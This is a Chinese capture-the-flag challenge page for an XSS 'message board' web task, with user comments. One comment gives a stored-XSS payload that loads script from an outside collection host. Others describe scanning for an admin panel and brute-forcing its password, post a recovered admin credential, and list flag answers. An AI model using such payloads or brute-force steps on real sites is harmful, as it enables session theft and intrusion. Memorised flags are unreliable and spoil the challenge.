留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 3345
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
18956160518 2年前
举报

难,参考https://blog.csdn.net/m0_57954651/article/details/127621060,不知道怎么得到密码的,就复制了,结果也出来了

回复 0
dzss 2年前
举报

db.sql怎么链接不上

回复 1
dzss 2年前
举报

这个密码怎么得出来的 admin 011be4d65feac1a8

回复 1
lwq522725 2年前
举报

sCRiPt/SrC=//i0.al/Logugk>

回复 0
qixi 2年前
举报

直接放入xss平台地址留言就行了

回复 0
Jaylon 2年前
举报

来个xss平台

回复 0
popoh 2年前
举报

db.sql压根就没有

回复 6
songci 2年前
举报

flag{750d33e925f6dbf1784a1a924c237534}

回复 0
19881191586 2年前
举报

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3
treasure11 2年前
举报

....太难了

回复 0
mAns0nw0W 2年前
举报

flag{0d25978069e52fed99591c5c19ca0663}

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(19)

解题动态

yinlin 攻破了该题 12小时前
念旧 攻破了该题 17小时前
Anonymous.. 攻破了该题 17小时前
admincon 攻破了该题 20小时前
粉红色的-毛 攻破了该题 2天前
一只十五 攻破了该题 3天前
xxsko 攻破了该题 3天前
aaaa1111 攻破了该题 3天前
thexx 攻破了该题 4天前
flag与她皆失 攻破了该题 6天前
3024769318 攻破了该题 7天前
xyjwkg 攻破了该题 8天前
Gcysnd 攻破了该题 8天前
shengood 攻破了该题 9天前
余生 攻破了该题 13天前
蟹不揉 攻破了该题 13天前
love_islet 攻破了该题 14天前
2333m 攻破了该题 15天前
echk 攻破了该题 16天前
edadsadw 攻破了该题 17天前
问题反馈